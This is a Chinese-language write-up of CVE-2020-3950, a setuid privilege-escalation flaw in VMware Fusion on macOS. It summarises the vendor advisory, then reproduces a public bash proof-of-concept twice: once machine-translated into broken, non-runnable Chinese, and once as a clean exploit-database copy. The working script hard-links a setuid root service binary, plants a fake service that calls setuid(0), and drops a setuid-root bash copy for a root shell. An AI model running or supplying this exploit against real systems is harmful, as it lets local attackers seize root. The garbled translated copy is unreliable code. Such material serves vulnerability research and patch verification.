1、描述

VMware Fusion是美国威睿（VMware）公司的一套专用于在苹果机（Mac）上运行Windows应用程序的的虚拟机软件。 VMware Fusion 11.x版本中存在一个权限提升漏洞，该漏洞允许攻击者配置系统路径。

3月17日，VMware官方发布编号为VMSA-2020-0005的安全公告，修复了存在于VMware Fusion，VMRC for Mac 和Horizon Client for Mac中的权限提升漏洞（CVE-2020-3950），由于VMware错误的使用了setuid，攻击者利用此漏洞可将目标系统中的普通用户权限提升至管理员权限。目前PoC已公开，建议相关用户升级版本进行防护。

某人对该漏洞的描述如下：VMware USB Arbitrator服务和Open VMware Fusion服务都是位于/Applications/VMware Fusion.app/Contents/Library/services的setuid root二进制文件。当脱离标准路径执行文件时，被执行的二进制文件可能被替换成攻击者所能控制的文件。这主要通过创建到原始二进制文件的硬链接来实现的。二进制文件在执行服务时使用了部分攻击者能控制的路径，并且未能正确地验证目标二进制文件是否合法。

在被告知补丁不完整后，VMware更新了安全建议，提供了修复说明，并承诺在下一个Fusion版本中发布完整的安全补丁。

2、过程

https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2020-3950.sh

【验证时修改一下标点符号什么的】

＃！/ bin / bash
＃说明：适用于CVE-2020-3950的PoC
＃作者：Rich Mirch @ 0xm1rch
＃咨询：https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh
＃供应商咨询：https://www.vmware.com/security/advisories/VMSA-2020-0005.html
＃
＃标题
＃
＃ VMware Fusion的特权提升漏洞
＃
＃
＃说明
＃
＃ VMware Fusion的11.5.1和之前很容易受到特权提升
＃漏洞。“ VMware USB仲裁器服务”和“ Open VMware Fusion服务”
＃都是setuid根二进制文件位于
＃ / Applications / VMware Fusion.app/Contents/Library/services。执行时
＃在标准路径之外可以诱骗二进制文件执行
＃攻击者控制的路径中的程序。这是通过实现
＃创建到原始二进制文件的硬链接。二进制文件使用了
＃在执行服务时由攻击者控制的路径，并且路径不正确
＃验证目标二进制文件是合法的。
＃
＃
＃影响
＃
＃具有标准帐户的本地攻击者可以执行任意代码
＃作为根。
＃
＃
＃测试环境
＃
＃ MACOS 10.14.6
＃ VMware Fusion的专业版11.5.1（15018442）
＃
＃
＃时间轴
＃
＃ 2019-12-23报告给供应商
＃ 2020-03-12补丁发布
＃ 2020-03-17通报已更新以包括CVE-2020-3950

回声 “ @ 0xm1rch的CVE-2020-3950 VMware Fusion EoP PoC ”

MKDIR -p 〜 / A / B / C
-p的mkdir 〜 /内容/库/服务

cat >  〜 / Contents / Library / services / VMware \ USB \ Arbitrator \ Service << EOF
＃！/ usr / bin / python
导入操作系统
os.setuid（0）
os.system（“ cp / bin / bash $ HOME / .woot; chmod 4755 $ HOME / .woot”）;
紧急行动

搭配chmod 755 〜 /内容/库/服务/ VMware的\ USB \仲裁\服务

CD  〜 / A / B / C
在“ / Applications / VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service ”中 。 2> / dev / null
“ $ {PWD} / Open VMware USB Arbitrator Service ”  > / dev / null 2> / dev / null和
p = $！
回声 “睡觉5秒钟”
睡5
杀死 $ {p？}
等待

回声 “睡眠7秒”
睡7

$ HOME /.woot -p

已知攻击向量

成功利用此问题可能会使具有普通用户特权的攻击者将其特权提升到安装了Fusion，VMRC或Horizon Client的系统上的root用户。

或者：

https://www.exploit-database.net/?id=102757

# Exploit Title: 
# Date: 2020-03-17
# Exploit Author: Rich Mirch
# Vendor Homepage: https://www.vmware.com/products/fusion.html
# Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html
# Software Link: https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg
# Versions:
# VMware Fusion Professional 11.5.1 (15018442)
# VMware Fusion Professional 11.5.2 (15794494)
#
# Tested on: macOS 10.14.6
# CVE : CVE-2020-3950
# Source PoC: https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh
#
#
#!/bin/bash
echo "CVE-2020-3950 VMware Fusion EoP PoC by @0xm1rch"

mkdir -p ~/a/b/c
mkdir -p ~/Contents/Library/services

cat > ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service <<EOF
#!/usr/bin/python
import os
os.setuid(0)
os.system("cp /bin/bash $HOME/.woot;chmod 4755 $HOME/.woot");
EOF

chmod 755 ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service

cd ~/a/b/c
ln "/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service" . 2>/dev/null
"${PWD}/Open VMware USB Arbitrator Service" >/dev/null 2>/dev/null &
p=$!
echo "Sleeping for 5 seconds"
sleep 5
kill ${p?}
wait

echo "Sleeping for 7 seconds"
sleep 7

$HOME/.woot -p